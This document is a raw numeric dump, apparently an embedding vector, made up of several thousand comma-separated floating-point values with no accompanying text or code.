0.020526524633169174, 0.01967725157737732, -0.026960857212543488, 0.01656804420053959, -0.003416889114305377, 0.028198782354593277, -0.006473916582763195, -0.04807755723595619, 0.015862714499235153, -0.04597596079111099, 0.0031236016657203436, -0.014955862425267696, 0.005649832542985678, -0.0022563342936336994, -0.004134813789278269, -0.015776347368955612, 0.026054004207253456, -0.0006976823206059635, 0.005941320676356554, -0.010961394757032394, 0.017258979380130768, 0.014236138202250004, 0.00603848323225975, -0.015416485257446766, -0.00153301190584898, 0.0066070654429495335, -0.019159050658345222, -0.0008546721073798835, -0.024456217885017395, -0.033107299357652664, -0.009601117111742496, -0.018367353826761246, 0.0006657445919699967, 0.010313643142580986, -0.004966094624251127, -0.014739945530891418, 0.011810668744146824, 0.0185832716524601, -0.011911430396139622, 0.0187991876155138, 0.015517246909439564, -0.009162085130810738, -0.04113941639661789, -0.004944503307342529, -0.010241670534014702, 0.0023355039302259684, 0.009133296087384224, 0.0014070601901039481, -0.005293569061905146, -0.013473231345415115, -0.01596347615122795, -0.016582438722252846, 0.022268256172537804, -0.028198782354593277, 0.017316557466983795, -0.0067330170422792435, -0.0007750526419840753, 0.007600284181535244, -0.0016256762901321054, -0.00026112483465112746, 0.0021663689985871315, -0.023578153923153877, -0.016222575679421425, 0.001685053575783968, -0.04370163381099701, -0.007686651311814785, 0.01724458485841751, -0.019015105441212654, -0.0020818014163523912, -0.006157238036394119, -0.005189209245145321, -0.0034258856903761625, 0.02035379223525524, -0.014466450549662113, 0.029019266366958618, -0.015934687107801437, -0.0259388480335474, 0.020152268931269646, -0.016452888026833534, 0.0009851220529526472, -0.03471948206424713, -0.00851433351635933, 0.023635732010006905, -0.005908933002501726, -0.015258146449923515, 0.0121273472905159, -0.00103190413210541, -0.02370770461857319, -0.013552401214838028, -0.018050674349069595, -0.007164851296693087, -0.017187006771564484, -0.0103424321860075, 0.006117653101682663, 0.026111582294106483, 0.03756958618760109, 0.0038397270254790783, -0.009694680571556091, -0.023693310096859932, 0.006786996033042669, -0.012875860556960106, -0.00689855357632041, 0.033510345965623856, -0.018266592174768448, -0.011422018520534039, -0.0035554359201341867, -0.020569708198308945, -0.004325540736317635, -0.003339518792927265, 0.008161668665707111, -0.03469069302082062, 0.027795735746622086, -0.01004734542220831, -0.009320423938333988, 0.02671615034341812, 0.033193666487932205, 0.01162354089319706, 0.020843204110860825, -0.01596347615122795, -0.01068789977580309, -0.008723053149878979, -0.013098974712193012, -0.02081441506743431, 0.004343533888459206, 0.008154471404850483, -0.01281108520925045, 0.003177580889314413, -0.006009694654494524, 0.002022424014285207, 0.01208416372537613, 0.002119586803019047, 0.019979534670710564, -0.003922495059669018, 0.0020656075794249773, -0.021217459812760353, -0.013293299823999405, -0.007020906545221806, -0.014754340052604675, -0.02049773558974266, -0.00002493730789865367, 0.0014547419268637896, -0.0046674092300236225, 0.003161387285217643, -0.019965140148997307, 0.016827143728733063, 0.009234057739377022, 0.02438424527645111, 0.013854685239493847, 0.009982570074498653, -0.004167201463133097, 0.0363316610455513, -0.0003643602249212563, -0.008183260448276997, 0.004296751692891121, -0.019000710919499397, -0.00043813191587105393, -0.014768734574317932, 0.007686651311814785, 0.000205796051886864, 0.01114132534712553, -0.0049481019377708435, -0.015430879779160023, -0.003753360128030181, -0.010947000235319138, 0.004807755351066589, 0.023448605090379715, -0.018727215006947517, 0.019547700881958008, 0.010371221229434013, 0.019734829664230347, -0.014192954637110233, -0.00206380826421082, 0.0120769664645195, -0.01674077846109867, -0.02008029632270336, 0.0045414576306939125, -0.022671302780508995, 0.000695433234795928, 0.007679454050958157, 0.003334120847284794, 0.016265759244561195, -0.00514602568000555, -0.017460500821471214, -0.006729418411850929, -0.0030606258660554886, 0.01544527430087328, -0.000041384122596355155, 0.011889838613569736, -0.005678621586412191, 0.0003223013482056558, 0.019749224185943604, -0.027248745784163475, -0.0071108718402683735, -0.01494146790355444, -0.019187839701771736, 0.0029922521207481623, -0.008089696057140827, -0.013458836823701859, 0.0037245710846036673, 0.011551568284630775, -0.0028321135323494673, 0.021347010508179665, -0.009082915261387825, 0.03169663995504379, 0.021951578557491302, 0.0006014192476868629, 0.01688472181558609, 0.013005410321056843, -0.00103190413210541, 0.0031056085135787725, 0.026413867250084877, -0.006042081862688065, -0.01780596934258938, -0.0054519083350896835, 0.00776582071557641, -0.0053763375617563725, -0.020987149327993393, 0.0130198048427701, 0.014739945530891418, 0.029364734888076782, 0.021433377638459206, -0.018424931913614273, 0.02146216668188572, 0.04030453786253929, 0.012587971054017544, 0.007614678703248501, -0.0074491421692073345, -0.023175109177827835, -0.0000014408534525500727, -0.014171363785862923, -0.010608729906380177, -0.018684031441807747, -0.00821204949170351, 0.01088942214846611, 0.0026917674113065004, 0.010263262316584587, -0.01789233647286892, -0.02580929920077324, -0.014279321767389774, 0.008089696057140827, 0.015632402151823044, -0.01038561575114727, -0.008521530777215958, 0.003452875418588519, 0.0021699676290154457, 0.04286675527691841, -0.017604446038603783, 0.020828809589147568, -0.00001842886740632821, -0.0005244987551122904, -0.023851649835705757, 0.010500771924853325, 0.010738280601799488, -0.015387697145342827, 0.018381748348474503, -0.0060240887105464935, -0.0036472007632255554, -0.015718769282102585, -0.005653431173413992, 0.002761940471827984, 0.010083331726491451, 0.02365012653172016, -0.0121273472905159, -0.022800853475928307, 0.01315655279904604, 0.025593381375074387, -0.005336752627044916, 0.0008060907712206244, -0.001999033149331808, -0.004393914248794317, -0.0032387576065957546, -0.00017734446737449616, -0.001885676640085876, 0.002394881332293153, 0.016582438722252846, 0.0013944649836048484, 0.03918176889419556, 0.011868246830999851, 0.022124312818050385, 0.0035644324962049723, -0.020555313676595688, -0.0017930121393874288, -0.002486645942553878, -0.014826311729848385, 0.01619378663599491, 0.03929692506790161, 0.022225074470043182, -0.0192166268825531, 0.018971921876072884, -0.01780596934258938, 0.006401943974196911, -0.006794193293899298, 0.0014952264027670026, -0.02054091915488243, 0.0007138761575333774, 0.0036849863827228546, -0.005613846238702536, -0.008730250410735607, -0.010234473273158073, 0.035669516772031784, 0.022800853475928307, -0.00791696272790432, -0.004044848028570414, 0.0010337034473195672, -0.009629905223846436, -0.009075718000531197, -0.01797870360314846, 0.02305995300412178, -0.008795025758445263, -0.013761120848357677, 0.014840706251561642, 0.014063404873013496, -0.00825523305684328, -0.032186053693294525, -0.004678205121308565, -0.0032999340910464525, 0.0023067151196300983, 0.020382581278681755, -0.009392396546900272, -0.007629073224961758, -0.014783129096031189, -0.0043975128792226315, -0.0025010404642671347, 0.00016947247786447406, 0.019331783056259155, 0.017215795814990997, 0.009860217571258545, -0.005228794179856777, 0.0022095523308962584, -0.008190457709133625, -0.011098142713308334, 0.007146858144551516, -0.029767779633402824, -0.01852569356560707, 0.00415280694141984, -0.00042778588249348104, -0.004062841180711985, 0.00953634176403284, -0.015229357406497002, 0.016265759244561195, 0.0016679600812494755, 0.016164997592568398, -0.009090112522244453, 0.01684153825044632, -0.0010427000233903527, -0.00015597765741404146, -0.010184093378484249, -0.014013024047017097, -0.0007291702786460519, 0.004588239826261997, 0.012177728116512299, -0.006254400592297316, 0.017863547429442406, 0.0012073367834091187, -0.007859384641051292, -0.014401675201952457, -0.0031721829436719418, -0.004160004202276468, -0.007607481442391872, -0.002666576998308301, -0.008456755429506302, -0.010104923509061337, 0.013854685239493847, -0.009097309783101082, -0.0010435996809974313, 0.008341600187122822, -0.006938138045370579, -0.004829347133636475, -0.0006846373435109854, -0.008622292429208755, -0.015286935493350029, 0.024945629760622978, -0.010716688819229603, -0.014236138202250004, 0.005926926154643297, 0.005739797838032246, 0.014797522686421871, 0.01734534651041031, -0.004465886857360601, 0.00007765145710436627, 0.001555503229610622, 0.022210679948329926, 0.002267130184918642, -0.008816617541015148, -0.0011875444324687123, -0.009234057739377022, -0.010788661427795887, -0.0026125977747142315, -0.03207089751958847, 0.010853435844182968, 0.0016841539181768894, -0.012998213060200214, 0.00007826997170923278, -0.0009887206833809614, 0.011630738154053688, 0.003145193448290229, -0.006139244884252548, 0.007369972765445709, 0.007384367287158966, -0.005916130263358355, 0.007549903355538845, -0.02232583425939083, 0.014970256946980953, -0.013278905302286148, 0.014898284338414669, 0.01587710902094841, -0.019547700881958008, 0.017402922734618187, 0.0029202797450125217, -0.024830473586916924, -0.00935641024261713, 0.009903401136398315, 0.004426301922649145, 0.022181890904903412, -0.020987149327993393, 0.014567211270332336, 0.0024722516536712646, -0.014739945530891418, -0.017676418647170067, 0.018223408609628677, 0.02366452105343342, 0.011206100694835186, -0.000287889561150223, 0.0006077168509364128, 0.005556268617510796, -0.007837792858481407, 0.01606423780322075, -0.014617592096328735, 0.009874612092971802, -0.011853852309286594, 0.011717105284333229, 0.017633235082030296, -0.004728585947304964, -0.03258909657597542, 0.007859384641051292, -0.007369972765445709, -0.014739945530891418, 0.018007490783929825, -0.006081666797399521, 0.01949012279510498, 0.023866044357419014, 0.0038433256559073925, 0.002349898451939225, 0.007172048557549715, 0.013753923587501049, 0.012300081551074982, -0.011364440433681011, -0.013070185668766499, -0.002680971520021558, 0.02818438783288002, -0.0175324734300375, -0.016956694424152374, 0.011745893396437168, 0.00009418261470273137, -0.0187991876155138, -0.02937912940979004, 0.01793552003800869, -0.00734478235244751, -0.011515581980347633, -0.009557933546602726, 0.02914881706237793, -0.028083626180887222, -0.018640847876667976, 0.019662857055664062, -0.002490244572982192, 0.008636686950922012, 0.0077514261938631535, 0.007996132597327232, -0.017863547429442406, -0.02507518045604229, 0.015718769282102585, -0.02314632013440132, 0.000999516574665904, -0.022023551166057587, -0.0076434677466750145, 0.0033305222168564796, -0.0038937062490731478, -0.005462704226374626, -0.012112952768802643, 0.03483463451266289, -0.0193173885345459, 0.025881271809339523, 0.011004578322172165, -0.008485544472932816, -0.006981321610510349, 0.0012136343866586685, -0.02507518045604229, 0.006423535756766796, 0.01652486063539982, -0.02310313656926155, 0.00508844805881381, -0.004339935258030891, -0.016452888026833534, -0.004465886857360601, 0.0005798275815322995, -0.01468956470489502, 0.021015938371419907, -0.0058801439590752125, -0.012868663296103477, -0.01925981044769287, 0.004771769512444735, -0.014452056027948856, 0.015229357406497002, -0.004073637071996927, 0.015560430474579334, 0.008938970975577831, 0.013833093456923962, -0.012609562836587429, 0.003008445957675576, -0.031322382390499115, -0.0027763349935412407, 0.003193774726241827, -0.0003654847969301045, 0.010083331726491451, -0.0017795172752812505, -0.01327170804142952, 0.01724458485841751, 0.01237925048917532, -0.002126784063875675, 0.0006738415104337037, -0.012199319899082184, -0.004080834332853556, 0.027018435299396515, 0.0007431149133481085, 0.011868246830999851, -0.007265612483024597, 0.00842076912522316, 0.007909765467047691, 0.022253863513469696, 0.012919044122099876, 0.004998482298105955, -0.0022761267609894276, 0.0018712821183726192, 0.0026629783678799868, -0.007139660883694887, 0.01450243592262268, -0.003940488211810589, 0.0038253325037658215, -0.014444858767092228, -0.010903816670179367, -0.0006864366587251425, -0.008931773714721203, 0.0063443658873438835, 0.003514051903039217, 0.02108790911734104, -0.011393229477107525, 0.03325124457478523, 0.011227692477405071, -0.000024712393496884033, -0.003972875885665417, 0.0029958507511764765, -0.03607255965471268, 0.020526524633169174, 0.011630738154053688, 0.028904112055897713, -0.01187544409185648, 0.003530245739966631, -0.007211633492261171, -0.0009149489924311638, -0.0002705712104216218, 0.007744228933006525, 0.0020818014163523912, -0.029767779633402824, -0.0017858148785308003, -0.00427875854074955, -0.016395309939980507, 0.0010849838145077229, 0.004041249398142099, 0.02809802070260048, -0.026068398728966713, 0.006779799237847328, 0.0008906582952477038, 0.005862151272594929, -0.021476561203598976, 0.018180225044488907, 0.0036849863827228546, -0.024125143885612488, 0.008298416621983051, -0.011299665085971355, 0.030861759558320045, 0.017230190336704254, -0.02831393852829933, -0.008355994708836079, 0.019101472571492195, 0.018496904522180557, 0.0005123534356243908, 0.02406756766140461, -0.012184925377368927, 0.01995074562728405, -0.005739797838032246, 0.03828931227326393, -0.013228525407612324, -0.02631310559809208, 0.0012154337018728256, -0.0013467833632603288, 0.010220078751444817, -0.007222429383546114, -0.003702979302033782, 0.022225074470043182, 0.012177728116512299, -0.008672673255205154, 0.0052000051364302635, 0.00924125500023365, 0.009428382851183414, -0.008586306124925613, 0.008104090578854084, 0.013336483389139175, 0.0019126662518829107, 0.0017858148785308003, -0.008607897907495499, -0.015315724536776543, 0.018381748348474503, 0.004800558555871248, -0.0017984100850299, -0.003577027702704072, -0.011350045911967754, -0.0012559181777760386, 0.014221743680536747, 0.013379666954278946, 0.012847071513533592, 0.0066646430641412735, 0.0020494137424975634, 0.017719602212309837, -0.009579525329172611, -0.0037425642367452383, 0.00427875854074955, -0.022944796830415726, -0.0015591018600389361, -0.011198903433978558, 0.000587024784181267, -0.017590051516890526, 0.021246248856186867, 0.012890255078673363, 0.000349290989106521, 0.01114132534712553, 0.005988102871924639, 0.012875860556960106, -0.015416485257446766, 0.005164018832147121, -0.012249700725078583, 0.016078632324934006, -0.014970256946980953, -0.010752675123512745, -0.0058549540117383, -0.009306029416620731, -0.009169282391667366, 0.017820363864302635, -0.028256360441446304, 0.005959313828498125, -0.003271145047619939, -0.008773433975875378, 0.0004475782916415483, -0.017187006771564484, 0.019159050658345222, -0.0020836007315665483, 0.0014250533422455192, 0.012415236793458462, 0.008377586491405964, 0.000975225877482444, -0.0112348897382617, -0.0129694240167737, 0.0011506585869938135, -0.009054126217961311, -0.017590051516890526, -0.01629454828798771, -0.0021645696833729744, -0.008032118901610374, -0.004267962649464607, 0.013041396625339985, -0.0077010453678667545, -0.004786164034157991, -0.012501603923738003, -0.008521530777215958, -0.0017345345113426447, 0.0023534970823675394, 0.0017732196720317006, 0.016755172982811928, 0.004170800093561411, -0.0019720434211194515, -0.008521530777215958, -0.022037945687770844, 0.01866963692009449, -0.0216349009424448, 0.014869495294988155, -0.026500234380364418, -0.008543122559785843, 0.029710201546549797, -0.000752111489418894, -0.011501187458634377, 0.004188793245702982, 0.0008398278150707483, -0.018741609528660774, -0.019849983975291252, 0.005952116567641497, 0.015776347368955612, 0.007794609759002924, -0.013192539103329182, 0.018640847876667976, -0.004012460820376873, 0.010227276012301445, -0.005002080928534269, -0.0024218708276748657, -0.02732071839272976, -0.023866044357419014, -0.0014286519726738334, 0.015560430474579334, 0.010025753639638424, 0.024456217885017395, -0.004595437087118626, -0.009068520739674568, 0.002904085908085108, 0.0022437393199652433, -0.024197116494178772, -0.0031254009809345007, 0.008953365497291088, 0.005027271341532469, -0.00965149700641632, 0.020008323714137077, -0.002506438409909606, -0.0002548272314015776, 0.001626575947739184, -0.009054126217961311, -0.020843204110860825, 0.010839041322469711, 0.012803887948393822, 0.008938970975577831, -0.01592029258608818, 0.005736199207603931, 0.01285426877439022, 0.005246787331998348, -0.0016130812000483274, -0.01642409898340702, -0.023851649835705757, -0.006592670921236277, 0.025334279984235764, 0.008571911603212357, 0.0010471983114257455, 0.012530392967164516, 0.0011560565326362848, -0.0029022865928709507, -0.016899116337299347, -0.007859384641051292, 0.008391980081796646, 0.009939386509358883, -0.00988180935382843, 0.005585057195276022, 0.016913510859012604, 0.016640016809105873, -0.01770520769059658, 0.025060785934329033, -0.015056624077260494, -0.0319269523024559, -0.0242546945810318, 0.00025347774499095976, 0.027982864528894424, -0.011018972843885422, 0.004944503307342529, -0.016999877989292145, -0.005721804685890675, 0.0025460233446210623, 0.007157654035836458, 0.013048593886196613, 0.010507969185709953, 0.02293040230870247, -0.02786770835518837, -0.02631310559809208, -0.02131822146475315, -0.006851771380752325, 0.008320008404552937, 0.009766653180122375, 0.004973291885107756, 0.0020710055250674486, 0.009824231266975403, -0.022772064432501793, -0.021894000470638275, -0.013228525407612324, 0.017546867951750755, 0.020612891763448715, 0.025823693722486496, -0.0005226994981057942, -0.016280153766274452, 0.02228265069425106, -0.0005825264961458743, 0.02365012653172016, -0.012782296165823936, -0.04128336161375046, -0.0035194498486816883, -0.00800332985818386, 0.009025337174534798, 0.02264251373708248, 0.002220348222181201, -0.0252047311514616, -0.003019241616129875, -0.01226409524679184, 0.010536757297813892, -0.0005460904794745147, -0.029076844453811646, 0.0016130812000483274, -0.01692790538072586, -0.009680286049842834, -0.013962643221020699, -0.014394477941095829, 0.006610664073377848, 0.0035554359201341867, -0.002040417166426778, -0.0174317117780447, 0.014488041400909424, -0.014574408531188965, 0.007657862268388271, -0.00702450517565012, 0.005513085052371025, 0.01856887713074684, 0.005739797838032246, -0.019518911838531494, -0.0008429766166955233, -0.009845823049545288, -0.020843204110860825, -0.0170142725110054, -0.020382581278681755, -0.00960831344127655, -0.007298000156879425, 0.016870327293872833, -0.0017003476386889815, -0.0043975128792226315, 0.0013701743446290493, 0.018266592174768448, -0.005041665863245726, -0.0014394477475434542, 0.009853020310401917, 0.03166785091161728, 0.00816886592656374, 0.013170947320759296, 0.018957527354359627, -0.021303826943039894, 0.006088864058256149, 5.341700557437434e-7, 0.003900903509929776, -0.012055374681949615, -0.006617861334234476, 0.005178413353860378, -0.00273315142840147, -0.026097187772393227, -0.006491909269243479, 0.01498465146869421, 0.00571820605546236, -0.013624372892081738, -0.015718769282102585, 0.016049843281507492, 0.021980367600917816, -0.007136062253266573, -0.0008096894016489387, -0.014084996655583382, 0.012192122638225555, 0.013077382929623127, -0.02114548720419407, -0.00327654299326241, -0.007355578243732452, 0.02635628916323185, -0.006783397402614355, 0.0026089991442859173, -0.0031685843132436275, 0.0012676137266680598, -0.005455506965517998, 0.023995595052838326, -0.0025496219750493765, 0.0005155022372491658, -0.00791696272790432, -0.010018556378781796, 0.015934687107801437, 0.013048593886196613, 0.0029922521207481623, 0.00667903758585453, -0.009363607503473759, 0.011098142713308334, -0.005379936192184687, -0.013027002103626728, 0.0021681683138012886, -0.01829538121819496, 0.023362237960100174, 0.0034114911686629057, -0.01201219204813242, -0.015085413120687008, -0.007175647187978029, 0.025060785934329033, 0.015258146449923515, 0.023966806009411812, -0.010155304335057735, -0.0012055374681949615, 0.014682367444038391, -0.01999392919242382, -0.00007326564082177356, -0.01724458485841751, 0.014243335463106632, -0.011731499806046486, -0.014034615829586983, -0.009435580112040043, 0.021606111899018288, 0.011083748191595078, 0.016582438722252846, -0.0020530123729258776, 0.007729834411293268, -0.006398345343768597, 0.02475850097835064, 0.011328454129397869, -0.01633773185312748, 0.013415653258562088, 0.008082498796284199, 0.024398639798164368, 0.006801390554755926, 0.003944086842238903, -0.006887757685035467, 0.01885676570236683, 0.014855100773274899, 0.017921125516295433, -0.01327170804142952, -0.016308942809700966, 0.022181890904903412, 0.022987980395555496, -0.00929163582623005, -0.0004624225839506835, -0.022397806867957115, 0.026327500119805336, -0.012033783830702305, 0.005369140300899744, -0.013221328146755695, -0.008334402926266193, -0.0032603491563349962, -0.019547700881958008, -0.0010903816437348723, 0.009802639484405518, 0.012544787488877773, -0.01692790538072586, 0.014797522686421871, -0.0032999340910464525, 0.003879311727359891, -0.0014907281147316098, 0.01514299027621746, 0.0033251242712140083, -0.019648462533950806, 0.003936889581382275, -0.004588239826261997, -0.0003308480663690716, -0.005523880943655968, -0.012796690687537193, 0.0020997943356633186, -0.012911846861243248, -0.010313643142580986, 0.013264510780572891, 0.0033413181081414223, -0.013962643221020699, 0.0036651939153671265, -0.004577443934977055, -0.023678915575146675, 0.008046513423323631, 0.018597664311528206, -0.029767779633402824, 0.0016652611084282398, 0.01093980297446251, 0.005012876819819212, 0.007607481442391872, -0.004336336627602577, 0.0020889986772090197, -0.005750593729317188, 0.008197654969990253, -0.022498568519949913, -0.004257166758179665, -0.0035086539573967457, 0.0050560603849589825, 0.011083748191595078, 0.018871160224080086, 0.009226860478520393, -0.013573992066085339, 0.020785626024007797, -0.011839457787573338, 0.0022473379503935575, 0.011465201154351234, 0.012623957358300686, -0.005318759474903345, -0.01544527430087328, -0.01587710902094841, -0.008866998367011547, 0.019231021404266357, -0.00196664547547698, -0.000017248070435016416, -0.017187006771564484, -0.027306323871016502, -0.00940679106861353, 0.04761693254113197, 0.001819102093577385, 0.022124312818050385, -0.007290802896022797, 0.0026413865853101015, -0.00894616823643446, -0.0022617322392761707, 0.010097726248204708, -0.014020221307873726, 0.00842076912522316, -0.01335807517170906, -0.00991059746593237, -0.009169282391667366, -0.00039157478022389114, -0.018093857914209366, -0.0013845688663423061, 0.032560307532548904, -0.006840975489467382, 0.025103969499468803, 0.010529560036957264, 0.027623003348708153, 0.015042229555547237, -0.031639061868190765, 0.0027223555371165276, -0.006585473660379648, 0.013883473351597786, -0.008341600187122822, 0.00906132347881794, -0.006365957669913769, -0.0005222496693022549, -0.0014124581357464194, -0.004354329314082861, -0.0052899704314768314, 0.008427966386079788, -0.0024146735668182373, -0.01132125686854124, -0.02402438409626484, 0.007082083262503147, -0.010536757297813892, -0.00757149513810873, 0.0012244302779436111, -0.024240300059318542, -0.015186173841357231, -0.01119170617312193, 0.012681534513831139, 0.01310617197304964, -0.003640003502368927, 0.011400426737964153, -0.008284022100269794, -0.004429900553077459, -0.005354745779186487, -0.009370804764330387, 0.00008996548422146589, -0.011249284259974957, -0.021793238818645477, 0.03518010303378105, 0.01024886779487133, 0.0025514212902635336, -0.02648583985865116, 0.000687336316332221, -0.0108174504712224, 0.012487209402024746, 0.009529144503176212, 0.0006189625710248947, -0.005397929344326258, 0.021764449775218964, 0.0006589971599169075, 0.016452888026833534, -0.008694264106452465, 0.013847487978637218, 0.0013431847328320146, 0.022210679948329926, 0.010716688819229603, -0.017460500821471214, 0.004455090966075659, -0.0013269908959046006, 0.027882102876901627, 0.005516683682799339, -0.0030786190181970596, -0.012587971054017544, -0.024873657152056694, -0.003706577932462096, 0.00901094265282154, -0.01144360937178135, 0.00305342860519886, -0.007485128473490477, -0.008845406584441662, -0.005826164968311787, 0.007844990119338036, -0.013581189326941967, -0.007528312038630247, -0.004771769512444735, -0.0017291366821154952, -0.001772320014424622, 0.004116820637136698, 0.014444858767092228, -0.031869374215602875, -0.015603614039719105, 0.021606111899018288, -0.0048617348074913025, 0.004519865848124027, 0.005052461754530668, -0.005804573185741901, 0.013905065134167671, 0.0033934980165213346, -0.0031631863676011562, -0.0026269922964274883, -0.008687067776918411, -0.009342015720903873, -0.00979544222354889, -0.0094499746337533, -0.011717105284333229, -0.012782296165823936, -0.010205685161054134, -0.009521947242319584, 0.00876623671501875, 0.003096611937507987, 0.013991432264447212, 0.03042992576956749, 0.01143641211092472, 0.003915297798812389, -0.01651046611368656, 0.022354623302817345, 0.0019738427363336086, -0.016812749207019806, 0.016481677070260048, -0.02270009182393551, 0.015546035952866077, 0.019878773018717766, -0.01990756206214428, -0.014869495294988155, 0.009097309783101082, 0.0007426650845445693, -0.010824646800756454, 0.008161668665707111, -0.021577322855591774, 0.0073915645480155945, -0.0026161964051425457, 0.009665891528129578, 0.006034884601831436, -0.004588239826261997, 0.0026593797374516726, -0.004933707416057587, 0.005167617462575436, -0.007593086920678616, 0.0027169575914740562, -0.026514628902077675, 0.02570853754878044, -0.018381748348474503, 0.002904085908085108, -0.008334402926266193, 0.027968470007181168, 0.02557898685336113, 0.00021715418552048504, -0.01255918201059103, -0.026341894641518593, 0.003998066298663616, 0.0034258856903761625, 0.009392396546900272, 0.007085681892931461, 0.0007327689090743661, 0.005441112443804741, 0.007089280057698488, -0.006157238036394119, 0.01839614287018776, -0.005275575909763575, 0.004106024745851755, -0.0056966147385537624, -0.009557933546602726, -0.023462999612092972, 0.0074995229952037334, -0.0011731499107554555, -0.02570853754878044, -0.012940635904669762, 0.005541874095797539, -0.007657862268388271, 0.01757565699517727, -0.0333951897919178, -0.009550736285746098, 0.0025784107856452465, -0.02471531741321087, 0.016496071591973305, 0.008082498796284199, -0.022081129252910614, 0.00796014629304409, -0.013717937283217907, 0.012386447750031948, 0.01141482125967741, 0.004451492335647345, 0.00044330491800792515, -0.002407476305961609, 0.012616760097444057, -0.009593919850885868, 0.003954882733523846, 0.011580357328057289, 0.012775098904967308, -0.0024146735668182373, 0.007672256790101528, -0.017777180299162865, -0.005923327524214983, -0.029537469148635864, -0.013897867873311043, 0.010601532645523548, -0.00469979690387845, -0.0032981347758322954, 0.007816201075911522, -0.015157384797930717, 0.006434331648051739, 0.018381748348474503, -0.00865108147263527, 0.01395544596016407, -0.01583392545580864, 0.0022311441134661436, -0.021721266210079193, 0.004383118357509375, 0.0004311595985200256, 0.010306445881724358, -0.005387133453041315, -0.027853313833475113, 0.00702450517565012, -0.0139122623950243, -0.017719602212309837, -0.003947685472667217, -0.005315160844475031, 0.037915054708719254, -0.020900782197713852, -0.003976474516093731, -0.002713358961045742, 0.0010292051592841744, -0.002108790911734104, 0.0034600726794451475, 0.005818967707455158, -0.017100639641284943, -0.003929692320525646, 0.0029418712947517633, 0.004671007860451937, 0.009550736285746098, 0.001172250253148377, 0.0036292076110839844, -0.00600609602406621, -0.04450772702693939, -0.004329139366745949, 0.013278905302286148, 0.0029022865928709507, -0.01907268352806568, -0.00919807143509388, -0.012444025836884975, 0.015387697145342827, -0.02009469084441662, 0.01592029258608818, 0.008881392888724804, -0.018554482609033585, 0.00034209375735372305, -0.010579940862953663, -0.000959032098762691, -0.006337168626487255, 0.007549903355538845, -0.011465201154351234, -0.025463830679655075, -0.002184361917898059, 0.011105339974164963, 0.002171766944229603, 0.017359741032123566, -0.02721995674073696, -0.013617175631225109, 0.009680286049842834, 0.007758623454719782, -0.019749224185943604, -0.0066070654429495335, -0.013674753718078136, 0.010493574663996696, -0.023405421525239944, -0.00812568236142397, 0.003497858066111803, 0.004789762664586306, -0.017690813168883324, -0.011976205743849277, -0.017129428684711456, 0.012523195706307888, -0.015200568363070488, -0.003003048012033105, 0.005315160844475031, 0.0040196580812335014, 0.012393645010888577, 0.015200568363070488, 0.009435580112040043, 0.00929163582623005, 0.006186026614159346, 0.0029436706099659204, 0.01509980671107769, -0.0013674753718078136, -0.022311439737677574, -0.0012667140690609813, -0.003559034550562501, -0.014214546419680119, 0.002749345265328884, 0.000959032098762691, 0.008974957279860973, -0.0020871993619948626, -0.003064224496483803, 0.004437097813934088, -0.007096477318555117, -0.016711989417672157, 0.015459668822586536, 0.011256481520831585, 0.006247203331440687, 0.00476817088201642, 0.020900782197713852, 0.009637102484703064, 0.007521114777773619, -0.006448726169764996, 0.014495238661766052, 0.007715439889580011, -0.0026161964051425457, -0.012480012141168118, 0.02694646269083023, 0.001950451754964888, 0.005739797838032246, 0.007085681892931461, -0.00816886592656374, 0.014315308071672916, 0.0010732882656157017, -0.00979544222354889, -0.0018928737845271826, -0.028357120230793953, -0.004566648043692112, 0.008874195627868176, 0.010803055949509144, 0.008046513423323631, 0.023434210568666458, 0.006797791924327612, -0.007780215237289667, 0.006034884601831436, -0.006175230722874403, -0.011126931756734848, -0.0012793091591447592, -0.008802223019301891, -0.01986437849700451, -0.027623003348708153, -0.014603197574615479, -0.009205268695950508, 0.0023121130652725697, 0.01959088444709778, -0.011976205743849277, -0.005955715198069811, -0.008276824839413166, 0.005689417477697134, 0.010824646800756454, -0.00018195519805885851, 0.00174982869066298, 0.01144360937178135, 0.02077123150229454, -0.004142011050134897, -0.012343265116214752, 0.01679835468530655, 0.005721804685890675, 0.019144656136631966, 0.0033323215320706367, -0.015402090735733509, -0.001500624348409474, -0.017172612249851227, -0.010025753639638424, -0.006567480508238077, -0.0024794486816972494, -0.009025337174534798, 0.00328913819976151, 0.004361526574939489, 0.02717677317559719, -0.003578827017918229, 0.010328037664294243, -0.0166975948959589, 0.014675170183181763, 0.011522779241204262, 0.038778722286224365, -0.0031541900243610144, -0.008413571864366531, -0.004044848028570414, -0.008974957279860973, 0.022253863513469696, 0.024585768580436707, -0.007996132597327232, 0.04681084305047989, 0.013653161935508251, 0.010579940862953663, -0.009126098826527596, -0.005815369077026844, -0.02255614660680294, 0.024542585015296936, 0.012120150029659271, -0.0054339151829481125, 0.008492741733789444, 0.008665475994348526, 0.013768318109214306, 0.004239173606038094, -0.02278645895421505, -0.01084623858332634, 0.02973899058997631, 0.010536757297813892, -0.008377586491405964, -0.00021085661137476563, -0.014106588438153267, -0.01434409711509943, -0.0001304499601246789, -0.0017453304026275873, -0.01587710902094841, 0.010371221229434013, 0.0057146078906953335, 0.0009806237649172544, 0.009824231266975403, 0.04361526668071747, 0.014624789357185364, -0.03673470765352249, 0.004908517003059387, 0.028126809746026993, -0.001389067154377699, -0.00502007408067584, 0.013869079761207104, -0.014754340052604675, 0.006369556300342083, -0.005257583223283291, 0.015776347368955612, 0.012415236793458462, 0.009853020310401917, 0.0071936403401196, -0.004318343475461006, 0.011270876042544842, 0.01208416372537613, 0.02123185433447361, 0.00978824496269226, 0.0037281697150319815, -0.007377170026302338, -0.01789233647286892, 0.0005825264961458743, -0.011630738154053688, 0.012897452339529991, 0.023578153923153877, 0.01221371442079544, -0.0032369582913815975, 0.014711156487464905, 0.0073051974177360535, 0.0029166811145842075, 0.0031847781501710415, 0.004516267217695713, -0.00022322685981635004, 0.012667139992117882, 0.01674077846109867, -0.0028842934407293797, 0.037915054708719254, 0.015546035952866077, -0.0011371637228876352, -0.0019036696758121252, 0.022671302780508995, -0.001654465333558619, -0.0024218708276748657, -0.005678621586412191, -0.01054395455867052, 0.002585608046501875, 0.005581458564847708, 0.018640847876667976, -0.010435996577143669, -0.027651792392134666, -0.002394881332293153, -0.01029924862086773, 0.032733041793107986, 0.011645132675766945, -0.008132879622280598, -0.009176479652523994, -0.02200915664434433, 0.011810668744146824, -0.0011263678316026926, -0.024197116494178772, 0.031408749520778656, -0.008694264106452465, -0.010659110732376575, -0.008485544472932816, -0.007244020700454712, 0.01208416372537613, 0.006150040775537491, -0.01106935366988182, 0.0008632188546471298, 0.02164929360151291, 0.02736390195786953, -0.009068520739674568, -0.002011628355830908, 0.0010040148627012968, -0.013329286128282547, 